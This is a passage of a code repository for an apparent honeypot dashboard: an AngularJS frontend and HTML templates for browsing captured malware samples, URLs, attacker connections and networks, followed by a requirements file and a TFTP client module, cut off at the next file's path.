    "content": "var isMobile = false; //initiate as false\n// device detection\nif(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|ipad|iris|kindle|Android|Silk|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(navigator.userAgent) \n    || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 
)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i.test(navigator.userAgent.substr(0,4))) isMobile = true;\n\nvar app = angular.module('honey', [\"ngRoute\", \"chart.js\", \"ngVis\"]);\n\napp.config(function($routeProvider) {\n\t$routeProvider\n\t.when(\"/samples\", {\n\t\ttemplateUrl : \"samples.html\",\n\t\tcontroller : \"samples\"\n\t})\n\t.when(\"/sample/:sha256\", {\n\t\ttemplateUrl : \"sample.html\",\n\t\tcontroller : \"sample\"\n\t})\n\t.when(\"/urls\", {\n\t\ttemplateUrl : \"urls.html\",\n\t\tcontroller : \"urls\"\n\t})\n\t.when(\"/url/:url\", {\n\t\ttemplateUrl : \"url.html\",\n\t\tcontroller : \"url\"\n\t})\n\t.when(\"/tag/:tag\", {\n\t\ttemplateUrl : \"tag.html\",\n\t\tcontroller : \"tag\"\n\t})\n\t.when(\"/connection/:id\", {\n\t\ttemplateUrl : \"connection.html\",\n\t\tcontroller : \"connection\"\n\t})\n\t.when(\"/asn/:asn\", {\n\t\ttemplateUrl : \"asn.html\",\n\t\tcontroller : \"asn\"\n\t})\n\t.when(\"/networks\", {\n\t\ttemplateUrl : \"networks.html\",\n\t\tcontroller : \"networks\"\n\t})\n\t.when(\"/network/:id\", {\n\t\ttemplateUrl : \"network.html\",\n\t\tcontroller : \"network\"\n\t})\n\t.when(\"/connections\", {\n\t\ttemplateUrl : \"connectionlist.html\",\n\t\tcontroller : \"connectionlist\"\n\t})\n\t.when(\"/tags\", {\n\t\ttemplateUrl : \"tags.html\",\n\t\tcontroller : \"tags\"\n\t})\n\t.when(\"/admin\", {\n\t\ttemplateUrl : \"admin.html\",\n\t\tcontroller : \"admin\"\n\t})\n\t.when(\"/\", {\n\t\ttemplateUrl : \"overview.html\",\n\t\tcontroller : \"overview\"\n\t})\n\t.otherwise({\n\t\ttemplate: '<h1>Error</h1>View not found.<br><a href=\"#/\">Go to index</a>'\n\t});\n});\n\napp.controller('overview', function($scope, $http, $routeParams, $location) {\n\n\t$scope.urls = null;\n\t$scope.samples = 
null;\n\t$scope.connections = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n    $scope.chart_options = {\n        \"animation\": isMobile ? false : {}\n    };\n\n\t$http.get(api + \"/url/newest\").then(function (httpResult) {\n\t\t$scope.urls = httpResult.data;\n\t});\n\n\t$http.get(api + \"/sample/newest\").then(function (httpResult) {\n\t\t$scope.samples = httpResult.data;\n\t});\n\n\t$http.get(api + \"/connections\").then(function (httpResult) {\n\t\t$scope.connections = httpResult.data;\n\t});\n\n\t$http.get(api + \"/connection/statistics/per_country\").then(function (httpResult) {\n\t\thttpResult.data.sort(function(a, b) { return b[0] - a[0] });\n\n\t\t$scope.country_stats_values = httpResult.data.map(function(x) {return x[0]});\n\t\t$scope.country_stats_labels = httpResult.data.map(function(x) {return COUNTRY_LIST[x[1]]});\n\t\t$scope.country_stats_data   = httpResult.data.map(function(x) {return x[1]});\n\t});\n\n\t$scope.clickchart_countries = function(a,b,c,d,e) {\n\t\tvar c = $scope.country_stats_data[c._index];\n\t\t$location.path(\"/connections\").search({country: c});\n\t\t$scope.$apply()\n\t};\n\n});\n\napp.controller('samples', function($scope, $http, $routeParams) {\n\n\t$scope.samples = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\t$http.get(api + \"/sample/newest\").then(function (httpResult) {\n\t\t$scope.samples = httpResult.data;\n\t});\n\n});\n\napp.controller('sample', function($scope, $http, $routeParams) {\n\n\t$scope.sample = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\t$scope.short = function (str) 
{\n\t\tif (str)\n\t\t\treturn str.substring(0, 16) + \"...\";\n\t\telse\n\t\t\treturn \"None\";\n\t};\n\n\tvar sha256 = $routeParams.sha256;\n\t$http.get(api + \"/sample/\" + sha256).then(function (httpResult) {\n\t\t$scope.sample = httpResult.data;\n\t});\n\n});\n\napp.controller('urls', function($scope, $http, $routeParams) {\n\n\t$scope.url = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\t$http.get(api + \"/url/newest\").then(function (httpResult) {\n\t\t$scope.urls = httpResult.data;\n\t});\n\n});\n\napp.controller('tags', function($scope, $http, $routeParams) {\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\t$http.get(api + \"/tags\").then(function (httpResult) {\n\t\t$scope.tags = httpResult.data;\n\t});\n\n});\n\nvar graph_accumulate_hours = 6;\nvar graph_tstep = 60 * 60 * graph_accumulate_hours;\nfunction roundDate(date) {\n\treturn Math.floor(date / graph_tstep);\n};\n\nfunction network_graph_data(networks)\n{\n\n\tvar firsttime = +Infinity;\n\tvar lasttime  = -Infinity;\n\tvar datasets  = [];\n\n\tfor (var i = 0; i < networks.length; i++)\n\t{\n\t\tvar network = networks[i];\n\t\tvar firsttime_net = Math.min.apply(null, network.connectiontimes);\n\t\tvar lasttime_net  = Math.max.apply(null, network.connectiontimes);\n\n\t\tfirsttime = Math.min(firsttime, firsttime_net);\n\t\tlasttime  = Math.max(lasttime,  lasttime_net);\n\t}\n\n\tvar first = roundDate(firsttime);\n\tvar last  = roundDate(lasttime);\n\tvar now   = time();\n\n\tfor (var j = 0; j < networks.length; j++)\n\t{\n\t\tvar network = networks[j];\n\t\tvar data = new Array((roundDate(now) - first) + 1).fill(0);\n\t\tfor (var i = 0; i < network.connectiontimes.length; i++)\n\t\t{\n\t\t\tvar t = 
network.connectiontimes[i];\n\t\t\tvar r = roundDate(now - t);\n\t\t\tdata[r] += (1/graph_accumulate_hours);\n\t\t}\n\t\t\n\t\tdata.reverse();\n\t\tdata = data.map(function (x) {return Math.round(x*100)/100;});\n\t\tdatasets.push(data);\n\t}\n\n\tvar labels = datasets[0].map(function(v,i,a) {\n\t\tvar tdiff = (a.length-i-1) * graph_tstep;\n\t\treturn formatDateTime(now - tdiff);\n\t});\n\n\treturn {\n\t\t\"datasets\":  datasets,\n\t\t\"labels\":    labels,\n\t\t\"firsttime\": firsttime,\n\t\t\"lasttime\":  lasttime\n\t};\n}\n\napp.controller('networks', function($scope, $http, $routeParams) {\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short  = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\tvar networks_show_graph = 4;\n\tvar networks_got        = 0;\n\tvar networks_requested  = 0;\n\n\t$http.get(api + \"/networks\").then(function (httpResult) {\n\t\t$scope.networks = httpResult.data;\n\t\t\n\t\tfor (var i = 0; i < $scope.networks.length; i++)\n\t\t{\n\t\t\tvar item = $scope.networks[i];\n\t\t\titem.order = item.firstconns;\n\t\t}\n\n\t\t$scope.networks.sort(function (a, b) { return a.order-b.order; });\n\t\t$scope.networks.reverse();\n\t\tnetworks_requested = Math.min(networks_show_graph, $scope.networks.length);\n\t\t$scope.networks_graph = [];\n\t\t$scope.timechart_series = [];\n\t\t\n\t\t$http.get(api + \"/network/biggest_history\").then(function (httpResult) {\n\t\t\tvar nets = httpResult.data;\n\t\t\t\n\t\t\t$scope.timechart_data = [];\n\t\t\t\n\t\t\tfor (var i = 0; i < nets.length; i++) {\n\t\t\t\t$scope.timechart_data.push(\n\t\t\t\t\tnets[i].data.map(function(x){ return x[1]; })\n\t\t\t\t);\n\t\t\t\t$scope.timechart_series.push(nets[i].network.malware.name + \" #\" + nets[i].network.id);\n\t\t\t}\n\t\t\t\n\t\t\t$scope.timechart_labels = nets[0].data.map(function(x){ return formatDay(x[0]); 
});\n\t\t\t\n\t\t\tconsole.log($scope.timechart_data);\n\t\t\tconsole.log($scope.timechart_labels);\n\t\t\t\n\t\t\tnetworks_got = nets.length;\n\t\t});\n\t\t\n\t});\n\t\n\t$scope.draw = function() {\n\t\tvar ret = network_graph_data($scope.networks_graph);\n\t\t\n\t\t$scope.timechart_data    = ret.datasets;\n\t\t$scope.timechart_labels  = ret.labels;\n\t};\n\n\t$scope.filterNoSamples = function(network) {\n\t\treturn true; // network.samples.length > 0;\n\t};\n\t\n\t$scope.timechart_options = {\n\t\t\"animation\": isMobile ? false : {},\n\t\t\"responsive\": true,\n\t\t\"maintainAspectRatio\": false,\n\t\tlegend: {\n\t\t\tdisplay:  true,\n\t\t\tposition: 'top',\n\t\t},\n\t\telements: {\n        line: {\n                fill: false\n        }\n\t\t}\n    };\n\n});\n\napp.controller('network', function($scope, $http, $routeParams) {\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short  = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\tvar id = $routeParams.id;\n\t\n\t$http.get(api + \"/network/\" + id).then(function (httpResult) {\n\t\t$scope.network = httpResult.data;\n\n\t\tvar ret = network_graph_data([$scope.network]);\n\t\t\n\t\t$scope.network.firsttime = ret.firsttime;\n\t\t$scope.network.lasttime  = ret.lasttime;\n\t\t$scope.timechart_data    = ret.datasets;\n\t\t$scope.timechart_labels  = ret.labels;\n\t\t\n\t});\n\t\n\t$scope.timechart_options = {\n\t\t\"animation\": isMobile ? 
false : {},\n\t\t\"responsive\": true,\n\t\t\"maintainAspectRatio\": false,\n    };\n    \n    $scope.graph_events = {\n    \t\"click\": function(ev) {\n    \t\tif (ev.nodes.length == 1) {\n    \t\t\tvar n    = ev.nodes[0];\n    \t\t\tvar d    = n.substr(2);\n    \t\t\tvar link = null;\n    \t\t\t\n\t\t\t\tif (n.startsWith(\"i:\")) link = \"#/connections?ip=\" + d;\n\t\t\t\tif (n.startsWith(\"s:\")) link = \"#/sample/\" + d;\n\t\t\t\tif (n.startsWith(\"u:\")) link = \"#/url/\" + encurl(d);\n\t\t\t\t\n\t\t\t\twindow.location.href = link;\n    \t\t\t\n    \t\t}\n    \t}\n    };\n\t\n\t$scope.graph_options = {\n\t\t\"interaction\": { \"tooltipDelay\": 0 },\n\t};\n\t$scope.graph_data = {\n\t\t\"nodes\": [],\n\t\t\"edges\": []\n\t};\n\t\n\t$scope.graph_enabled = false;\n\t$scope.loadgraph = function() {\n\t\tvar graph_nodes     = [];\n\t\tvar graph_nodes_set = {};\n\t\tvar node = function(n) {\n\t\t\tif (! (n in graph_nodes_set)) {\n\t\t\t\tvar color = \"#dddddd\";\t\t\t\t\t\t// ip\n\t\t\t\tif (n.startsWith(\"s:\")) color = \"#ffbbbb\";\t// sample\n\t\t\t\tif (n.startsWith(\"u:\")) color = \"#bbbbff\";\t// url\n\t\t\t\n\t\t\t\tgraph_nodes.push({\n\t\t\t\t\t\"id\":    n,\n\t\t\t\t\t\"label\": \"\",\n\t\t\t\t\t\"title\": n.substring(2),\n\t\t\t\t\t\"color\": color\n\t\t\t\t});\n\t\t\t\tgraph_nodes_set[n] = true;\n\t\t\t}\n\t\t};\n\n\t\tvar graph_edges = $scope.network.has_infected.map(function(e) {\n\t\t\tnode(e[0]);\n\t\t\tnode(e[1]);\n\t\t\treturn { \"from\": e[0], \"to\": e[1], \"id\": e[0] + \"-\" + e[1] };\n\t\t});\n\n\t\t$scope.graph_data = {\n\t\t\t\"nodes\": graph_nodes,\n\t\t\t\"edges\": graph_edges\n\t\t};\n\t\t$scope.graph_enabled = true;\n\t};\n\n});\n\napp.controller('url', function($scope, $http, $routeParams) {\n\n\t$scope.url = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\tvar url = 
$routeParams.url;\n\t$http.get(api + \"/url/\" + url).then(function (httpResult) {\n\t\t$scope.url = httpResult.data;\n\t\t$scope.url.countryname = COUNTRY_LIST[$scope.url.country];\n\t});\n\n});\n\napp.controller('tag', function($scope, $http, $routeParams) {\n\n\t$scope.tag = null;\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.fakenames = fakenames;\n\n\tvar tag = $routeParams.tag;\n\t$http.get(api + \"/tag/\" + tag).then(function (httpResult) {\n\t\t$scope.tag         = httpResult.data;\n        $scope.connections = $scope.tag.connections;\n\t});\n\n});\n\napp.controller('connection', function($scope, $http, $routeParams) {\n\n\t$scope.connection = null;\n\t$scope.lines = [];\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.displayoutput = true;\n\t$scope.fakenames = fakenames;\n\n\tvar id = $routeParams.id;\n\t$http.get(api + \"/connection/\" + id).then(function (httpResult) {\n\t\t$scope.connection = httpResult.data;\n\n\t\t$scope.connection.countryname = COUNTRY_LIST[$scope.connection.country];\n\t\t\n\t\tvar last_i = $scope.connection.stream.length - 1;\n\t\t$scope.connection.duration    = $scope.connection.stream[last_i].ts;\n\n\t});\n\n});\n\napp.controller('connectionlist', function($scope, $http, $routeParams, $location) {\n\n\t$scope.connection = null;\n\t$scope.lines = [];\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.COUNTRY_LIST = COUNTRY_LIST;\n\t$scope.fakenames = fakenames;\n\n\t$scope.filter = $routeParams;\n\n\tvar url = api + \"/connections?\";\n\n\tfor (key in $routeParams)\n\t{\n\t\turl = url + key + \"=\" + $routeParams[key] + \"&\";\n\t}\n\n\t$http.get(url).then(function (httpResult) 
{\n\t\t$scope.connections = httpResult.data;\n\n\t\t$scope.connections.map(function(connection) {\n\t\t\tconnection.countryname = COUNTRY_LIST[connection.country];\n\t\t\treturn connection;\n\t\t});\n\n\t});\n\n\t$scope.nextpage = function() {\n\t\tvar filter = $scope.filter;\n\n\t\tfilter['older_than'] = $scope.connections[$scope.connections.length - 1].date;\n\n\t\t$location.path(\"/connections\").search(filter);\n\t\t$scope.$apply();\n\t};\n\n});\n\napp.controller('asn', function($scope, $http, $routeParams, $location) {\n\n\t$scope.connection = null;\n\t$scope.lines = [];\n\n\t$scope.formatDate = formatDateTime;\n\t$scope.nicenull = nicenull;\n\t$scope.short = short;\n\t$scope.encurl = encurl;\n\t$scope.decurl = decurl;\n\t$scope.COUNTRY_LIST = COUNTRY_LIST;\n\t$scope.REGISTRIES = {\n\t\t\"arin\": \"American Registry for Internet Numbers\",\n\t\t\"ripencc\": \"RIPE Network Coordination Centre\",\n\t\t\"lacnic\": \"Latin America and Caribbean Network Information Centre\",\n\t\t\"afrinic\": \"African Network Information Centre\",\n\t\t\"apnic\": \"Asia-Pacific Network Information Centre\"\n\t};\n\t$scope.fakenames = fakenames;\n\n\tvar asn = $routeParams.asn;\n\t$scope.filter = { \"asn_id\" : asn};\n\n\t$http.get(api + \"/asn/\" + asn).then(function (httpResult) {\n\t\t$scope.asn = httpResult.data;\n\t\t$scope.asn.countryname = COUNTRY_LIST[$scope.asn.country];\n\n\t\t$scope.connections = $scope.asn.connections.sort(function(x, y) {return y.date - x.date} ).slice(0,8);\n\t\t$scope.urls = $scope.asn.urls.sort(function(x, y) {return y.date - x.date} ).slice(0,8);\n\t});\n\n});\n\napp.controller('admin', function($scope, $http, $routeParams, $location) {\n\n    $scope.loggedin = false;\n    $scope.errormsg = null;\n\n    $scope.username = null;\n    $scope.password = null;\n\n    $scope.new_username = null;\n    $scope.new_password = null;\n\n\t$scope.login = function() {\n        var auth = btoa($scope.username + \":\" + $scope.password);\n        
$http.defaults.headers.common['Authorization'] = 'Basic ' + auth;\n        $http.get(api + \"/login\").then(function (httpResult) {\n            $scope.errormsg = \"Logged in as \" + $scope.username;\n            $scope.loggedin = true;\n        }, function (httpError) {\n            $scope.errormsg = \"Bad credentials\";\n        });\n        $scope.password = null;\n    };\n\n\t$scope.logout = function() {\n        delete $http.defaults.headers.common['Authorization'];\n        $scope.errormsg = null;\n        $scope.loggedin = false;\n        $scope.username = null;\n        $scope.password = null;\n    };\n\n    $scope.addUser = function() {\n        var newuser = {\n            \"username\": $scope.new_username,\n            \"password\": $scope.new_password\n        };\n        $http.put(api + \"/user/\" + newuser.username, newuser).then(function (httpResult) {\n            $scope.errormsg     = \"Created new user \" + $scope.new_username;\n            $scope.new_username = null;\n            $scope.new_password = null;\n        }, function (httpError) {\n            $scope.errormsg     = \"Error creating new user \\\"\" + $scope.new_username + \"\\\" :(\";\n            $scope.new_username = null;\n            $scope.new_password = null;\n        });\n    };\n\n});\n"
  },
  {
    "path": "html/samples.html",
    "content": "<h2>Samples</h2>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th class=\"hidden-xs\">SHA256</th>\n\t\t<th>Name</th>\n\t\t<th>Size (Bytes)</th>\n\t\t<th>First Seen</th>\n\t\t<th class=\"hidden-xs\">N⁰ Urls</th>\n\t</tr>\n\t<tr ng-repeat=\"sample in samples\">\n\t\t<td class=\"hidden-xs\"><span ng-show=\"sample.sha256 != null\"><a href=\"{{ '#/sample/' + sample.sha256 }}\">{{sample.sha256}}</a></span></td>\n\t\t<td><a href=\"{{ '#/sample/' + sample.sha256 }}\">{{ sample.name }}</a></td>\n\t\t<td>{{ sample.length }}</a></td>\n\t\t<td>{{ formatDate(sample.date) }}</td>\n\t\t<td class=\"hidden-xs\">{{ sample.urls }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "html/tag.html",
    "content": "<h1>Tag Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Name</td><td>{{ tag.name }}</td></tr>\n\t<tr><td>Code</td><td><span style=\"font-family: monospace;\">{{ tag.code }}</span></td></tr>\n\t<tr><td>N° Hits</td><td>{{ tag.connections.length }}</td></tr>\n\n</table>\n\n<h2>Connections</h2>\n\n<div ng-include=\"'connectionlist-embed.html'\"></div>\n"
  },
  {
    "path": "html/tags.html",
    "content": "<h1>Tags</h1>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Name</th>\n\t\t<th>Code</th>\n\t\t<th>N⁰ Hits</th>\n\t</tr>\n\t<tr ng-repeat=\"tag in tags\">\n\t\t<td><a href=\"{{ '#/tag/' + tag.name }}\">{{ tag.name }}</a></td>\n\t\t<td><span style=\"font-family: monospace;\">{{ tag.code }}</span></td>\n\t\t<td>{{ tag.connections }}</td>\n\t</tr>\n\n</table>\n\n"
  },
  {
    "path": "html/url.html",
    "content": "<h1>URL Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>URL</td><td>{{ url.url }}</td></tr>\n\t<tr><td>First seen</td><td>{{ formatDate(url.date) }}</td></tr>\n\t<tr><td>Resolves to</td>\n\t\t<td>\n\t\t\t<span ng-show=\"url.country\"><img src=\"img/flags/{{ url.country.toLowerCase() }}.png\"> {{ url.countryname }} <a href=\"#/connections?country={{ url.country }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></span><br>\n\t\t\t<span>{{ url.ip }} </span><br>\n\t\t\t<span ng-show=\"url.asn\">AS{{ url.asn.asn }} <b>{{ url.asn.name }}</b>\n\t\t\t\t<a href=\"#/asn/{{ url.asn.asn }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a>\n\t\t\t</span><br>\n\t\t</td>\n\t</tr>\n\n</table>\n\n<h2>Sample</h2>\n\n<table class=\"table\" ng-show=\"url.sample != null\">\n\n\t<tr><td>First seen</td><td>{{ formatDate(url.sample.date) }}</td></tr>\n\t<tr><td>First seen file name</td><td>{{ url.sample.name }}</td></tr>\n\t<tr><td>File size</td><td>{{ url.sample.length }} Bytes</td></tr>\n\t<tr><td>SHA256</td><td><a href=\"{{ '#/sample/' + url.sample.sha256 }}\">{{ url.sample.sha256 }}</a></td></tr>\n\t<tr><td>Virustotal result</td><td>{{ nicenull(url.sample.result, \"Not Scanned yet\") }}</td></tr>\n\n</table>\n\n<h2>Connections included this URL</h2>\n\n<table class=\"table\">\n\n\t<tr>\n\t\t<th>Date</th>\n\t\t<th>IP</th>\n\t\t<th>Username</th>\n\t\t<th>Password</th>\n\t</tr>\n\t<tr ng-repeat=\"connection in url.connections\">\n\t\t<td><a href=\"{{ '#/connection/' + connection.id }}\">{{ formatDate(connection.date) }}</a></td>\n\t\t<td>{{ connection.ip }}</td>\n\t\t<td>{{ connection.user }}</td>\n\t\t<td>{{ connection.pass }}</td>\n\t</tr>\n\n</table>"
  },
  {
    "path": "html/urls.html",
    "content": "<h1>Urls</h1>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Country</th>\n\t\t<th>Url</th>\n\t\t<th>Date</th>\n\t\t<th class=\"hidden-xs\">Sample</th>\n\t\t<th class=\"hidden-xs\">N⁰ Connections</th>\n\t</tr>\n\t<tr ng-repeat=\"url in urls\">\n\t\t<td><span ng-show=\"url.country\"><img src=\"img/flags/{{ url.country.toLowerCase() }}.png\"> {{ url.countryname }} <a href=\"#/connections?country={{ url.country }}\"><span class=\"glyphicon glyphicon-screenshot\"></span></a></span></td>\n\t\t<td><a href=\"{{ '#/url/' + encurl(url.url) }}\">{{ url.url }}</a></td>\n\t\t<td>{{ formatDate(url.date) }}</td>\n\t\t<td class=\"hidden-xs\"><span ng-show=\"url.sample != null\"><a href=\"{{ '#/sample/' + url.sample }}\">{{ short(url.sample, 16) }}</a></span></td>\n\t\t<td class=\"hidden-xs\">{{ url.connections }}</td>\n\t</tr>\n\n</table>\n"
  },
  {
    "path": "requirements.txt",
    "content": "setuptools\nwerkzeug\nflask\nflask-httpauth\nflask-socketio\nsqlalchemy\nrequests\ndecorator\ndnspython\nipaddress\nsimpleeval\npyyaml\nargon2\neventlet\n"
  },
  {
    "path": "tftpy/TftpClient.py",
    "content": "\"\"\"This module implements the TFTP Client functionality. Instantiate an\ninstance of the client, and then use its upload or download method. Logging is\nperformed via a standard logging object set in TftpShared.\"\"\"\n\nimport types\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nfrom TftpContexts import TftpContextClientDownload, TftpContextClientUpload\n\nclass TftpClient(TftpSession):\n    \"\"\"This class is an implementation of a tftp client. Once instantiated, a\n    download can be initiated via the download() method, or an upload via the\n    upload() method.\"\"\"\n\n    def __init__(self, host, port, options={}):\n        TftpSession.__init__(self)\n        self.context = None\n        self.host = host\n        self.iport = port\n        self.filename = None\n        self.options = options\n        if self.options.has_key('blksize'):\n            size = self.options['blksize']\n            tftpassert(types.IntType == type(size), \"blksize must be an int\")\n            if size < MIN_BLKSIZE or size > MAX_BLKSIZE:\n                raise TftpException, \"Invalid blksize: %d\" % size\n\n    def download(self, filename, output, packethook=None, timeout=SOCK_TIMEOUT):\n        \"\"\"This method initiates a tftp download from the configured remote\n        host, requesting the filename passed. It saves the file to a local\n        file specified in the output parameter. If a packethook is provided,\n        it must be a function that takes a single parameter, which will be a\n        copy of each DAT packet received in the form of a TftpPacketDAT\n        object. 
The timeout parameter may be used to override the default\n        SOCK_TIMEOUT setting, which is the amount of time that the client will\n        wait for a receive packet to arrive.\n\n        Note: If output is a hyphen then stdout is used.\"\"\"\n        # We're downloading.\n        log.debug(\"Creating download context with the following params:\")\n        log.debug(\"host = %s, port = %s, filename = %s, output = %s\"\n            % (self.host, self.iport, filename, output))\n        log.debug(\"options = %s, packethook = %s, timeout = %s\"\n            % (self.options, packethook, timeout))\n        self.context = TftpContextClientDownload(self.host,\n                                                 self.iport,\n                                                 filename,\n                                                 output,\n                                                 self.options,\n                                                 packethook,\n                                                 timeout)\n        self.context.start()\n        # Download happens here\n        self.context.end()\n\n        metrics = self.context.metrics\n\n        log.info('')\n        log.info(\"Download complete.\")\n        if metrics.duration == 0:\n            log.info(\"Duration too short, rate undetermined\")\n        else:\n            log.info(\"Downloaded %.2f bytes in %.2f seconds\" % (metrics.bytes, metrics.duration))\n            log.info(\"Average rate: %.2f kbps\" % metrics.kbps)\n        log.info(\"%.2f bytes in resent data\" % metrics.resent_bytes)\n        log.info(\"Received %d duplicate packets\" % metrics.dupcount)\n\n    def upload(self, filename, input, packethook=None, timeout=SOCK_TIMEOUT):\n        \"\"\"This method initiates a tftp upload to the configured remote host,\n        uploading the filename passed.  
If a packethook is provided, it must\n        be a function that takes a single parameter, which will be a copy of\n        each DAT packet sent in the form of a TftpPacketDAT object. The\n        timeout parameter may be used to override the default SOCK_TIMEOUT\n        setting, which is the amount of time that the client will wait for a\n        DAT packet to be ACKd by the server.\n\n        The input option is the full path to the file to upload, which can\n        optionally be '-' to read from stdin.\n\n        Note: If input is a hyphen then stdin is used.\"\"\"\n        self.context = TftpContextClientUpload(self.host,\n                                                 self.iport,\n                                                 filename,\n                                                 input,\n                                                 self.options,\n                                                 packethook,\n                                                 timeout)\n        self.context.start()\n        # Upload happens here\n        self.context.end()\n\n        metrics = self.context.metrics\n\n        log.info('')\n        log.info(\"Upload complete.\")\n        if metrics.duration == 0:\n            log.info(\"Duration too short, rate undetermined\")\n        else:\n            log.info(\"Uploaded %d bytes in %.2f seconds\" % (metrics.bytes, metrics.duration))\n            log.info(\"Average rate: %.2f kbps\" % metrics.kbps)\n        log.info(\"%.2f bytes in resent data\" % metrics.resent_bytes)\n        log.info(\"Resent %d packets\" % metrics.dupcount)\n"
  },
  {
    "path": "tftpy/TftpContexts.py",
